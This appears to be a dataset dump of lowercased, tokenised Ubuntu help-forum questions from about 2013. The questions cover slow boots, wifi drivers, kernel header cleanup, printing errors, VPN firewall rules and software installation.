301438	computer running very slowly under 13.04	after having some bouts with windows 8 i decided to throw it out and run ubuntu as the main operating system . currently i am having some problems with performance : even when running the simplest tasks , such as logging in to the ui or console , or running apt-get upgrade , it takes a very long time , and the cpu fan is spinning at full speed . i run top , and the top application itself takes about 13 % . as a comparison , if i run top on a 2007 macmini also running ubuntu 13.04 , top uses about 0,5 % . cold-boot to login-prompt gui takes minutes , compared to about 15 seconds on windows 7 and less than a minute on the macmini . starting a terminal window by ctrl-alt-t takes perhaps 20 seconds , and even editing a command line has significant delays . question : how do i solve this performance problem ? i have installed ubuntu 13.04 ( 64 bit ) on an acer aspire 8951g on the 120 gb ssd in ext4 format , with a 32 gb swap on an hdd . then , coming from a windows environment , i started by doing an update : sudo apt-get update & & apt-get upgrade . it also was very slow . i have 32 gb ram installed ( which works in the bios , windows in ubuntu ) . i have the most current bios ( 1.13 ) i could find on the acer support site . if i start partedmagic from the current ultimate boot cd , there is the same performance problem . if i try the partedmagic on another acer i have ( acer aspire v3-571g ) , there is the same performance problem . in windows 7 that i had installed yesterday as the main operating system , there were no performance problems . i tried hardinfo with results hardinfo . /var/log/syslog contains /var/log/syslog more info 2013-05-30 : i tried ubuntu live usb-stick 13.04 x86_64 on my : acer v3-571g ( the one that was slow earlier with partedmagic ) with the following hardinfo . ubuntu was very responsive and i was happy with the performance on that computer . here is the /var/log/syslog . acer aspire 8951g ( my problem-computer ) with the resulting /var/log/syslog contents . i selected to try ubuntu from the stick . the system did not even get to the login screen before i gave up . an interesting part from the end of the problem-syslog : timeout : killing 'keymap input/event , -- -- -- rcu_sched self-detected stall on cpu , -- -- -- bug : soft lockup - cpu # 3 stuck for 22s ! a memory test using memtest86+ for several hours ( 1 iteration ) passed ok . i tried installing bumblebee and its suggested dependencies with no noticeable change in performance . sudo powertop -- time=60 -- html produces the report powertop.html edit 2013-06-06 : grep graphics /var/log/xorg.0.log and cat /var/log/xorg.0.log results are at paste.ubuntu.com i cat /proc/cpuinfo | grep `` cpu mhz '' and cat /proc/cpuinfo results are also at paste.ubuntu.com
301440	how do i recover my root password in ubunto terminal ?	i 'm trying to install xampp in my ubuntu and in the process its asking for my root password which i do n't remember ? i know my sudo user password . how can i recover my root password ? please help ! !
301441	how to search multiple file names in nautilus ?	how to search for multiple file names at once in ubuntu via the gui ? i tried nautilus but without success .
301442	atheros ar9462 wifi very unstable & package loss	i 'm having severe issues w/ package-loss and a generally bad connection w/in a wifi-network at my uni . i 'm usually encountering a package loss of ~50 % and aborting connections which makes working w/ saas impossible . i 'm using ubuntu 13.04 and my network-adapter is an atheros ar9462 . applying the nohwcrypt=1-option does n't change anything . also very noticable : the connection works as intended in other networks ; the problematic network uses wpa2 w/ mschapv2 . anyone can help my out here ? $ sudo lshw -class network *-network unclaimed description : ethernet controller product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d3500000-d350ffff *-network description : wireless interface product : ar9462 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 01 serial : e0:06 : e6:76 : ba:89 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-22-generic firmware=n/a ip=131.173.74.130 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : d3400000-d347ffff memory:9fb00000-9fb0ffff
301444	how to upgrade kile2.1 beta 4 to kile-2.1.3 in ubuntu 11.04 ?	i want to upgrade kile 2.1 beta 4 to latest stable version kile 2.1.3 in 'ubuntu11.04 ' . will there any problem if i upgrade it ? my second question : i have kile-2.1.3.tar.bz2 file . how do i install it through terminal or any other way ?
301446	wake on lan configure port	i was just wondering if there was a way to change the port that wakeonlan is configured on ( default port 9 ) ? i 'm using 64bit ubuntu 13.04 . i figured worst case i can route it using iptables from a different port to port 9 , but if i can configure the port it 's a cleaner solution . thanks in advance . rob
301448	gui mysql tool for multiple databases	i have two discrete mysql databases ( located in different servers ) . in windows , i can use odbc and ms access and query from tables residing in different databases . in ubuntu , is there a way or tool to do this task ?
301452	ca n't dual boot with windows xp	i recently installed ubuntu 12.04 into my system on a separate partition . however after the installation was successfully completed , the system keeps booting windows xp without showing the dual boot screen . any suggestions , please ?
301457	installing ubuntu onto mac mini	i 've been trying to install ubuntu 12.04 , 13.04 and 13.10 onto my mac mini using every tutorial i could find using dd or even a program similar to unetbootin for mac , and nothing seems to be working . i only have the mac option for now so i 'm not able to make a bootable usb on windows and every time i try to boot it says isolinux.bin missing or corrupted ( except with the other program i do n't recall what that error was , it was an early attempt . ) i 've now been trying for three weeks and and i have downloaded each ubuntu many times and checked everyone of then and even installed them in virtualbox . i 'm currently trying to install windows 7 into virtualbox to start trying from windows , so i 'll respond when i do , but why has every attempt of mine failed after checking and rechecking to make sure i do it right , made sure i was dd to the disk and not the partition . any ideas ? my cdrom does n't work ( kind of ) also . it does n't accept any types of cds besides blanks . so unfortunatly i ca n't even completely format a new copy of mac without downloading an image from the internet and copying it to a pen drive also . i do have refit , or actually refind which is a continuation of refit because refit is n't maintained anymore . and when i boot and select my flash drive to boot from that 's when the screen flashes like any normal boot and throws the error . also i have tried refit . â user162727 24 mins ago the mac is from 2009 , i 've even tried installing ubuntu into virtual box and used dd to copy it to the flash drive , also made a backup image via dd of the virtual machine and tried restoring it to my second partition and neither of the two options have worked . giving the same or simalar error . p.s . i 'm only posting this because i 've already searched this database and tried everything that i could find and nothing worked .
301458	how can i tell if my computer has bluetooth ?	how can i tell if dell inspiron laptop has bluetooth in ubuntu 13.04 ?
301459	irq set in bios is not the same as the irq set at startup	i installed elo serial touchscreen as /ttys1 ( as presented below ) . besides , two other serial cables connect to ttys0 and ttys3 . here is the output of dmesg | grep -i ttys* [ 0.000000 ] console [ tty0 ] enabled [ 0.439285 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.505038 ] serial8250 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 0.592570 ] serial8250 : ttys2 at i/o 0x3e8 ( irq = 4 ) is a 16550a [ 0.716429 ] serial8250 : ttys3 at i/o 0x2e8 ( irq = 3 ) is a 16550a [ 1.030684 ] 00:06 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 1.052600 ] 00:07 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 1.076594 ] 00:08 : ttys2 at i/o 0x3e8 ( irq = 11 ) is a 16550a [ 1.097278 ] 00:09 : ttys3 at i/o 0x2e8 ( irq = 10 ) is a 16550a [ 14.362091 ] serio : serial port ttys1 [ 14.401343 ] serio : serial port ttys1 [ 14.441145 ] input : elo serial touchscreen as /devices/pnp0/00:07/tty/ttys1/serio2/input/input5 [ 16.889503 ] bluetooth : rfcomm tty layer initialized the problem is when i connect my device to /dev/ttys3 packets are sent but they are not received by the other machine unless i touch the screen ! i think /dev/ttys3 and /dev/ttys1 ( touch screen ) conflict . to solve this problem , i reserved an auxiliary irq in bios and after bootup i set the irq of /dev/ttys3 to 14 ( for example ) setserial /dev/ttys3 irq 14 again i have the same problem , however , changing the irq was irrelevant as i see , because in the former case ( /dev/ttys1 and /dev/ttys3 both using irq 3 ) the packet was not received unless the screen on the panel machine was touched . as you saw above , /dev/ttys0 and /dev/ttys2 also share the same irq but i can successfully send a packet via /dev/ttys0 . i think this is because /dev/ttys2 is useless in our testing . update and solution : as i checked bios , i had serial port1 address [ 3f8/irq4 ] serial port2 address [ 2f8/irq3 ] serial port3 address [ 3e8 ] serial port3 irq [ 11 ] serial port4 address [ 2e8 ] serial port4 irq [ 10 ] i solve the problem by setting the irq of /dev/ttys3 to 10 . but , if it is set in the bios to have irq 10 , why does dmesg show its irq as 3 ( same as ttys1 ) at startup ! could anyone explain the reason to me please .
301462	replacing some characters in the previous command	sometimes , being rushed , it is possible to type some characters wrong in a command-line . if the command is long , the mistake correction may be cumbersome ( using arrow keys ) . so the problem is : how can i replace characters typed wrong in the previous command as quickly as possible ?
301464	ubuntu what free tools packages available for making professional software mockups ?	like : http : //www.balsamiq.com/ for linux is there any professional quick mockup builders available ? ( not pen and paper we know we do that mostly but it needs to be quick and professional for sharing , not like open-office power point or gimp or with wine macromedia flash ) . something specially dedicated for linux in a sense of making specific professional mockup 's under linux . is there somthing ?
301466	files are piling up in /usr/src/ . how can i stop this ?	i have been having many serious system issues over the past few weeks and have been scratching my head as to why . i 've now worked out that this problem is having no inodes left on the root partition $ df -i filesystem inodes iused ifree iuse % mounted on /dev/sda6 732960 724565 8395 99 % / udev 125179 518 124661 1 % /dev tmpfs 127001 464 126537 1 % /run none 127001 4 126997 1 % /run/lock none 127001 8 126993 1 % /run/shm /dev/sda7 5234688 144639 5090049 3 % /home what is the cause ? i 've found that 400k of those are in use in /usr/src $ ls /usr/src linux-headers-3.2.0-25-generic linux-headers-3.2.0-33 linux-headers-3.2.0-25-generic-pae linux-headers-3.2.0-33-generic linux-headers-3.2.0-26 linux-headers-3.2.0-33-generic-pae linux-headers-3.2.0-26-generic linux-headers-3.2.0-35 linux-headers-3.2.0-26-generic-pae linux-headers-3.2.0-35-generic linux-headers-3.2.0-27 linux-headers-3.2.0-35-generic-pae linux-headers-3.2.0-27-generic linux-headers-3.2.0-36 linux-headers-3.2.0-27-generic-pae linux-headers-3.2.0-36-generic linux-headers-3.2.0-29 linux-headers-3.2.0-36-generic-pae linux-headers-3.2.0-29-generic linux-headers-3.2.0-39 linux-headers-3.2.0-29-generic-pae linux-headers-3.2.0-39-generic linux-headers-3.2.0-30 linux-headers-3.2.0-39-generic-pae linux-headers-3.2.0-30-generic linux-headers-3.2.0-40 linux-headers-3.2.0-30-generic-pae linux-headers-3.2.0-40-generic linux-headers-3.2.0-31 linux-headers-3.2.0-40-generic-pae linux-headers-3.2.0-31-generic linux-headers-3.2.0-41 linux-headers-3.2.0-31-generic-pae linux-headers-3.2.0-41-generic linux-headers-3.2.0-32 linux-headers-3.2.0-41-generic-pae linux-headers-3.2.0-32-generic linux-headers-3.2.0-43 linux-headers-3.2.0-32-generic-pae surely not all of these are actually needed ? i 've tried apt-get autoremove but it leaves them all be . i do n't want to remove them manually , but this is crippling my machine . they also take up almost 2g of the 11g system partition that is getting full ( > 80 % ) aside from the inode issue . how can i safely remove the headers that are not needed ?
301474	how can i tell inside an upstart script if the job was killed ( crashed ) or stopped normaly	is there a way to know within the script if the job in question was killed ( crashed ) or stopped normaly . i want to kill another process in post-stop script only when the current job crashed and not when it was stopped using stop `` task-a ''
301475	increase bluetooth transmit power level	my bluetooth headphones have a much smaller range when connected to my laptop ( dell precision m4600 ) running on ubuntu than when i am using them with my phone ( samsung galaxy s3 ) . hciconfig hci0 inqtpl gives : hci0 : type : br/edr bus : usb bd address : e4 : d5:3d : e3 : a4:52 acl mtu : 1021:8 sco mtu : 64:1 inquiry transmit power level : 0 so i have figured increasing that level might help . however when i try it with sudo hciconfig hci0 inqtpl 4 nothing really changes . i 've tried any other integer value up to 7. hciconfig hci0 features gives : hci0 : type : br/edr bus : usb bd address : e4 : d5:3d : e3 : a4:52 acl mtu : 1021:8 sco mtu : 64:1 features page 0 : 0xff 0xff 0x8f 0xfe 0x9b 0xff 0x79 0x87 < 3-slot packets > < 5-slot packets > < encryption > < slot offset > < timing accuracy > < role switch > < hold mode > < sniff mode > < park state > < rssi > < channel quality > < sco link > < hv2 packets > < hv3 packets > < u-law log > < a-law log > < cvsd > < paging scheme > < power control > < transparent sco > < broadcast encrypt > < edr acl 2 mbps > < edr acl 3 mbps > < enhanced iscan > < interlaced iscan > < interlaced pscan > < inquiry with rssi > < extended sco > < ev4 packets > < ev5 packets > < afh cap . slave > < afh class . slave > < 3-slot edr acl > < 5-slot edr acl > < sniff subrating > < pause encryption > < afh cap . master > < afh class . master > < edr esco 2 mbps > < edr esco 3 mbps > < 3-slot edr esco > < extended inquiry > < simple pairing > < encapsulated pdu > < err . data report > < non-flush flag > < lsto > < inquiry tx power > < epc > < extended features > features page 1 : 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 any ideas on what else i can try in order to increase the range ? i do n't see why the laptop with a much larger antena should have a smaller range than a smartphone . have n't got windows installed so i did not have change to try it there yet . i also tried it with some much older bluetooth headphones , same pattern there . the new headphones are bluetooth v3 . the old ones are v2 , i think .
301484	how do i update ubuntu manually ?	i wanted to update ubuntu manually , because i used cdma usb modem and connected using wvdial , but it wo n't able to update ubuntu via update manager , because my ubuntu wo n't showing `` connected '' message via network-manager . can i update ubuntu manually ? am i should download separate files , or use terminal instead ?
301488	i need help unpacking evolution-3.8.0.tar.xz	when i right-click the file and click run , i am told : there is no application installed for âtar archive ( xz-compressed ) â files . do you want to search for an application to open this file ? when i search for files on line , the following pops up in a window : gdbus.error : org.freedesktop.dbus.python.xdg.exceptions.parsingerror : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 489 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 1030 , in _install_mime_types path ) ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 33 , in __init__ self.parse ( filename ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 42 , in parse inifile.parse ( self , file , [ `` desktop entry '' , `` kde desktop entry '' ] ) file `` /usr/lib/python2.7/dist-packages/xdg/inifile.py '' , line 81 , in parse raise parsingerror ( `` invalid line : `` + line , filename ) parsingerror : parsingerror in file '/usr/share/app-install/desktop/workrave : workrave.desktop ' , invalid line : - rsi ( repetitive strain injury ) oraz wspomaga rekonwalescencj\u0119 i do n't understand this ! i have 7zip installed which is supposed to extract this type of compressed file , but it is not offered to me when i right click on the file . any suggestions would be appreciated .
301489	how to install gcc/g++ 4.4 and make links	because i can not compile some code by gcc/g++ 4.7 , i want to install gcc/g++ 4.4 . i searched the internet and found some different way . i do n't know what is the best solution . is it possible to choose what version i want to use without make a `` gcc '' link again ?
301494	how to change ntfs acls on linux ?	it is not about samba configuration , i want to change windows permissions on a external ntfs drive , or another partition in my pc whose runs windows , or even a network directory ( but my pc is not the server ) . i want a icacls equivalent on linux , i found fatattr , but it only change some attributes , like hidden and system files , it is good , but still not what i am looking for . i tried googling for `` cacls alternative for linux '' and `` change ntfs acl linux '' and `` change windows permissions linux '' and all other combinations you could imagine , but i just found about samba server configurations and setfacl that do not work on ntfs partitions . who could help me ?
301497	no internet connection after upgrade to 12.10	i upgraded my system to 12.10 , and now i have no network connection . when i go to system settings > network , there is nothing there . what 's wrong ?
301499	can i resize the k-menu in kubuntu ?	i have a question about the k-menu in kubuntu . how can i resize it vertically so it makes better use of my screen estate ? alternatively , can i set it to use two columns , or smaller symbols such that i can squeeze more favorites into the existing size of the k-menu ? my usual screen resolution is 1920x1080 . system version is : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise
301503	lxde : pcmanfm thumbnails of images > 2mb are not shown	im using lxde , with pcmanfm but images bigger than 2mb are just shown with image-symbol and not with the thumbnail . how can i change that behavior ?
301506	usb drive wo n't mount	i have a lexar 16gb usb stick and for some reason it wo n't mount . ubuntu wo n't even recognize it . info about it ... nothing much . i used it once as a backtrack liveusb and tried to use it once as an ubuntu studio 12.10 liveusb ( ended up with a kernel panic ) . so now i am trying to just reformat it ( easiest/fastest way to wipe everything off ) and just use it as a regular usb drive or maybe use it as a backtrack liveusb again . is there any way i can force ubuntu to recognize it ? i know the port works as my usb mouse receiver works fine . i 'm running ubuntu 12.04 lts ( old hardware , i 'll upgrade soonish ) on a toshiba satellite a105 . edit : by using this guide i was able to force-mount it , but it still does n't show up in places ( pcmanfm because i use lxde ) like it usually does . another strange thing , neither does the windows ntfs partition i set to automount . it appears that my system has stopped auto-mounting things . the devices show up in their respective /media/devicehere/ folders , but not under places in pcmanfm wierdness . oh well . however it was , i just had to delete/unmount anything with the name lexar or external usb in the media folder and it is now recognized ! thanks anyways @ manuel . edit : never mind , now it has disappeared again . if i want to access the /media/lexar folder i have to be root and the windows partition still does n't show up . help !
301513	microsoft media pack for moonlight	i recently reinstalled my computer , a few days ago . now i have to watch a video lecture . to watch these you need silverlight . so i installed moonlight . now moonlight needs the microsoft media pack which is provided by microsoft indeed . microsoft , on 17 may , decided to take those offline ( see here ) since moonlight is not being developed any more . now i ca n't watch my video lectures ... does someone know how to fix this and how i can install the microsoft media pack ? i need `` silverlight-media-pack-linux-x64-21-1.so '' file by the way .
301520	13.04 packages can not be authenticated	i am unable to install updates because the following packages can not be authenticated : libudev1 libxml2 libasound2 google-chrome-stable libgudev-1.0-0 libtiff5 linux-image-3.8.0-19-generic libsystemd-daemon0 systemd-services nautilus-sendto-empathy gnome-control-center-signon libaccount-plugin-1.0-0 mcp-account-manager-uoa account-plugin-yahoo account-plugin-salut account-plugin-jabber account-plugin-aim empathy empathy-common duplicity firefox-globalmenu firefox firefox-gnome-support firefox-locale-en flashplugin-installer gir1.2-gudev-1.0 linux-headers-3.8.0-19 linux-headers-3.8.0-19-generic linux-image-extra-3.8.0-19-generic linux-libc-dev python-libxml2 telepathy-idle thunderbird-globalmenu thunderbird thunderbird-gnome-support
301522	brightness buttons are not working at all	i have asked this question multiple times . i have an acer 5750 laptop running ubuntu 13.04 and all of a sudden then brightness buttons wont adjust the computers brightness . it was working not too long ago but one day when i booted up it all of a sudden wouldent work ... i really need these buttons as it prevents me from going to settings and changing it from there ... someone please help me i really need these buttons
301523	what is the default method / program to download photos from a photo camera to the computer ?	i am in xubuntu 12.10 and thunar does n't access the camera memory ( canon ) so as to just copy/paste the pictures . i want to import the pictures onto the pc . i heard about f-spot and rapid-photo-downloader - but what i read on them were rather old articles . are they the thing ?
301528	how can i get dash lenses to see files in network shares ?	i 'd love to get more use out of the dash files/music/video/photos lenses , but all of my documents and media are on ( cifs ) network shares . these shares are always mounted and the files always available , but i do n't see the results i should when i run file-related searches on the dash . sample searches do return the relevant files if i copy them into my desktop or elsewhere on the local system , so i know it 's not an issue with dash not being able to parse the files . is this something that can be enabled via a setting tweak/change ? some way to let unity/dash know it 's okay to search/index network shares ? should it already be doing this out of the box and it 's just not working on my particular setup ?
301529	screen shows a weird rectangle	i have got one little problem . why is my netbook showing ugly rectangles :
301530	is there a tool to remove all hyperlinks from an html file ?	is there a way to do this in ubuntu ? i 've read it 's possible in php , but i 'm not familiar with php at all .
301531	why did not they make a distribution for ubuntu server 13.04 for 32-bit ?	what happened to the 32-bit version of ubuntu ? i understand that the current 64-bit pcs are coming , but there are places in the world where 32-bit is still used .
301533	skype on 64 bit has non default mouse cursor theme	i have installed skype from canonical partner repository on my 64-bit ubuntu system . when i hover the mouse over the skype window , the mouse cursor theme changes from default white to black . how can i fix it ?
301534	error in jdk installation in 12.04	i downloaded the jdk7 update 21 tar.gz . i then extracted it and created a folder jvm under /usr/lib . then when i tried to move it to /usr/lib/jdk1.7.0 it showed me permission denied . what do i do ?
301538	call ubuntu settings with command line	what command can i use in the terminal to open the settings options ?
301540	export image as svg in gimp	i have a project i have been working on ( an image ) within gimp and i would like to export it as an svg . is this possible , or am i going to have to stick with exporting multiple sizes of an image ? i know gimp can read svgs , but can it export them ?
301541	resolving windows hostname	my main host is windows and im running ubuntu on a virtual guest os , im currently mounting a folder in windows and in ubuntu and i get this error : in /etc/fstab //windows-pc/shared /home/user/shared` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- mount -a mount error : could not resolve address for windows-pc : unknown error how do i resolve a windows hostname in ubuntu ?
301543	how to open the additional drivers window using command line	how can i launch the additional drivers window from the command line ?
301545	eclipse rcp : swt text focus and default selection ( return key ) events	i am having a strange problem on my rcp . i do n't use linux to develop so my knowledge for common bugs is very less . i am using ubuntu 11.10 to try out the rcp . in my rcp , i have an swt text that has two listeners attached to it - one for focus ( focusadapter ) and the other for swt.defaultselection . in the focusadapter , i implement the focuslost method . the behaviour is such , if and when the user edits the text and hits the return key , then the swt.defaultselection listener 's handleevent will be called and display a message to confirm the new text and update the text field . if the user edits the text but does not hit the return key and simply clicks outside the text field , then the focuslost event is called which reverts the text back to the original text ( text.settext ( originaltext ) ; ) . this seems to work fine when i launch it from eclipse but when i export the product via maven+tycho , that behaviour seems to stop working . what happens is that when the user edits the text , it just reverts back to the original text irrespective of whether the user hits the return key or not , or simply clicks outside the text field . no message dialog to confirm the edited text is displayed either . from what i gather it seems to just use the focuslost event and the return key has no effect . i apologise if this is something obvious but i have not encountered this on a windows machine which is what i use for my primary development .
301546	byobu how to create a second column for multiple screens	so i have up to 12 different screens in byobu . however , after the 12 screen i can no longer fit it in my terminal session . i have a monitor 1024x780 so the 13th screen and there after are just display unless i continue to hit f4 . is there a way to wrap the screens into a second column ?
301548	ubuntu does not load , missing initrd.img-3.0.5-17-generic	i 'm running ubuntu 12.10 on an amd hp computer . to install a recent update i had to clear some files out of /boot , and i stupidly erased a bunch of initrd.img packages that i mistook for useless files . i am a newbie . so now ubuntu does not load at all . i can boot from a disk to access the files on my computer , but i do n't know how to fix this . any help would be greatly appreciated !
301549	why accents in freesans capital letters do n't print ?	steps to reproduce the problem : open a new document with libreoffice writer write the following : liberation sans mérida mérida free sans mérida mérida select the first three lines and set the font to liberation sans ( maybe is alrady set ) select the last three lines and set the font to free sans print it if you want , convert it to pdf and then print it the result is that the mérida word with free sans font will be printed as merida , without the diaeresis ( ´ ) , but the other three are printed correctly : mérida , mérida and mérida . i did three versions of this file in my ubuntu machine : .odt .pdf .doc tested in three different ubuntu ( 12.04 ) machines in my office with three different printers , and they all had the same problem . tested with the following software : libreoffice 4.0.3.3 openoffice 3.2 evince 3.4.0 . and the printers : hp color laser jet cp4525 hp laser jet p4014 hp color laser jet 4700dn but , this is what really really pissed me off , i used a windows machine and it printed : the .pdf with adobe reader tthe .doc with microsoft word the .odt with open office 2.4 and in all this three tests , the word mérida was printed correctly in all cases . i did this test in the same printers before . why is this happening ? people is pleading with this issue in order to revert their machines to windows .
301550	is there a way to move my settings from my usb persistence to full install on portable hard drive ?	i want to do a full install of ubuntu on a portable hard drive , and i have been using a live usb with persistence so far . can i move these settings over so i do n't have to start again ?
301554	screen resolution changes when a key is pressed	ubuntu 13.4 64 bit ( same behaviour on 12.4 ) . laptop is off . an external screen is connected via vga . i start the laptop ( auto-login ) . screen resolution is the highest for both the laptop screen and the external screen ( that 's exactly what i want ) . i press any key . resolution changes to mirrored screens . this happens only once per running ( but sometimes after standby ) . = > how to disable the resolution change after pressing a key ? please tell me if you need more information !
301569	dconf editor missing options	ever since i installed dconf-editor a few months ago , i noticed i do n't have all the options many tutorials tell me i should have ? for example i was trying out gnome today and wanted to tweak it with this article : http : //www.omgubuntu.co.uk/2013/05/add-categories-to-gnome-shell-dashboard but i just do n't have the options listed there : same happens when i 'm trying to tweak unity . what i see : i tried to run the program as sudo , same happened..
301570	two users with same name but different passwords	is it possible to create two users with the same name , and let lightdm choose between them at login if one of the passwords is given ? for example , to anyone opening my computer , it would seem like there is only one user . if he would enter the right password , he would login to the `` real '' user , if he enters another pre-defined password he would login to the `` dummy '' account , and any other password would result in an error . is it possible ?
301576	block all non-squid traffic for pptp users	i have squid running on a transparent proxy ( port 3128 ) and vpn clients connecting + ip forwarding via pptpd . i want to allow users to connect to port 80 ( 3128 ) but block all other tcp traffic . i am currently using the following : iptables -t nat -a prerouting -i ppp+ -p tcp -- dport 80 -j redirect -- to-port 3128 iptables -t filter -a input -i ppp+ -p tcp -- dport 80 -j accept iptables -t filter -a input -i ppp+ -p tcp -- dport 3128 -j accept iptables -t filter -a input -i ppp+ -p tcp -j drop although i can see that the http traffic is going through squid , i expect https ( 443 ) to be blocked but i can still load an https page when connected to the vpn . can you point me in the right direction of what is wrong here to block all non http tcp traffic from vpn clients ? thanks
301579	how to get hangouts chrome webapp window in ubuntu ? ( without opening chrome browser )	is there anyway i can get the hangouts chrome app window in ubuntu 13.04 if i close the chrome browser ? ps -eaf| grep chrome this gives me that there are few instance of chrome is running and indicating the '' continue running background apps when google chrome is closed '' option is working fine here . in windows 7 , system tray will have a hangout icon to get the hangout window , without even opening the chrome browser . is there a way to get this in ubuntu ?
301581	upgrade to 12.04 lts from 11.04 using iso/cd	i am using ubuntu 11.10 oneric ocelot . in it wifi gets idle after some time . to get connection back i have to disconnect and reconnect . so i chose to upgrade 12.04 lts precise pangolin . but the issues i am not able to complete the download . wifi become idle after it downloads 20 or something files ( out of 2,000 ) and i have restart pc to get the connection . i am downloading the iso in windows . can i upgrade from iso without loosing my settings ? if yes , please tell me how . thanks in advance .
301589	bash alias permanent < without running bash or . ~/.bashrc >	i 'm used to putting my alias in .bashrc , but ubuntu suggests putting them in .bash_aliases . so that 's fine , i put my alias there in the .bash_aliases file . however i want to run my aliases once i log in . in order to do this i need to run bash . looking around , i 've read that i need to put them in .bash_profiles file . if that 's the case i believe i need to edit some more files and i 'm unclear from that perspective . what is the simplest way to run aliases on ubuntu server without running bash each time ? i could just run bash and be done with it , but that 's one more command . any thoughts or ideas would be appreciated .
301590	how can i make it possible for all users to log in without a password ?	i have a system with two accounts . the primary ( and administrator ) account automatically logs in at boot time and is used 95 % of the time . on occasion i need to logout and switch to a secondary account dedicated to part time work which is set to log in without a password ( just click login ) . when i log out of that account i would like to log back into the other without a password but i do n't see any way to set that as an option in the `` users and accounts '' . i know how to get disable the password when the screen goes to sleep and i want to keep the password intact because it seems like it is necessary for administrative purposes . having something that could easily be reversed would also be a plus ( in other words just re-enable the password for login ) . this is marked as a duplicate , but that question does not answer my specifics and the methods referenced do not show up in my stock 13.04 install . i have placed an answer below that did fit the bill .
301591	13.04 gnome session fallback : canâ´t edit panels	iâ´ve upgraded to 13.04 , and installed classic gnome via gnome-session-fallback . i ca n't edit the panels . right-clicking does nothing , with or without alt , win , or ctrl . how can i add/remove widgets and bars ?
301596	installing ubuntu into usb drive	i have a windows xp machine and my hard disk crashed and i can not get a replacement ata hard drive now a days . i downloaded the rar file of ubuntu rar . how can i install into a usb drive so that from boot up it loads ubuntu and since i have a separate external hdd , can use it ?
301601	correct kernel version to install on a motion computing m1400 tablet ?	i am looking for some help installing ubuntu on my m1400 motion computing tablet . i have tried the latest version ( ubuntu-12.04.2-desktop-i386.iso ) with the universal usb installer ( universal-usb-installer-1.9.3.4.exe ) since i do not have an optical drive . i booted from the usb and it gave an error saying `` unable to boot - please use a kernel appropriate for your cpu '' . i do not know exactly what this means , so if anyone can point me towards another version of ubuntu that is for my setup , please let me know .
301603	firefox stuck in 6.0 and not updating . apt-get says that its latest version	i 'm having trouble updating firefox , it does not update from the terminal and does n't show up in the update manager . i 'm running ubuntu 12.04 . if i run apt-get install firefox it claims that the latest version is already installed and if i run firefox -v i get that mozilla firefox is version 6.0.2 . how can i solve this problem ? i do n't want to manually download and upgrade firefox with archives and move and deleting folders every time a new version i released . update : the output of sudo apt-get update is here .
301604	is it still recommended to apply the cgroups patch to ubuntu 13.04 ?	you sure remember about the ~200-line linux kernel patch that does wonders . since a better alternative came out ( see link below ) i 've always been running it . now that i 'm about to install ubuntu 13.04 from scratch , do you know if it 's still recommended to apply this tweak ? or has raring already got optimized cgroups ? thank you in advance ! getting the alternative to the 200-line linux kernel patch to work
301607	how to install firebird on ubuntu 12.04	i would like intall firebird on ubuntu 12.04 32bit . i 've downloaded it from here . there is a .rpm file in ~/downloads/firebirdss-2.5.2.26540-0.i686.rpm . i 've seen this link for how to install it , but i do n't understand ! what i must to do with that .rpm file ? tnx
301613	install 13.04 on mac mini ( end 2012 )	i am trying to install ubuntu 13.04 ( the 64-bit mac variant ) onto my mac mini . thus i shrunk the main macosx partition and installed refind . now i can boot into refind and then select the usb stick , but it does not boot due to : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) sadly i can not find anyone who tried a recent mac mini/ubuntu version . how best to debug this issue ? update 1 : so i figured maybe refind does not provide the necessary driver and installed it again via install.sh -- drivers-all . which lead to a wsod . luckily i eventually could get back into restore via command + r and am now reinstalling macosx . update 2 : after my macosx was working again i did : installed _refit set up my future ubuntu partition as fat booted twice booted into ubuntu live cd and that 's where the next trouble started . while wireless and graphics work great in ubuntu 13.04 , they mount the fat partition as /cdrom , which makes installing on it impossible .
301619	how to install warsow ?	i 'm trying to install some linux-based games and i came across warsow . downloading it from the usc did n't work because there was no such package ( ? ) . on the website of warsow i found a guide on how to install it on ubuntu . this is what it says to do ( all as sudo ) : wget -o warsow_1.02_unified.tar.gz http : //www.warsow.net/download ? dl=linux102 then tar zxvf warsow_1.02_unified.tar.gz then cd warsow_1.02 wget -o warsow_1.02_ubuntu12.04.tar.gz http : //www.warsow.net/download ? dl=precisebins102 tar zxvf warsow_1.02_ubuntu12.04.tar.gz after this i should be able to run the game using ./warsow when i do so , it says there is no such command . now how do i open the game or where can i find it to run it without using the terminal ?
301620	unable to install ubuntu 12.10 - hard drive not recognized	i have an hp probook 4520 and i am trying to do a dual install with windows 7 . the usb device i used only detects itself as an installable location . if i exit the installer and open up the file system , it mounts and detects the 500meg internal drive . can anyone help with this ? thanks in advance .
301623	cups `` client-error-not-possible ''	i have a network printer and my machine recently stopped being able to print , other machines can print fine . besides having to use root to change its settings , when i try to change its settings i get the following error : cups `` client-error-not-possible '' . many forum threads suggest installing smbclient to solve the issue , but i already have it installed .
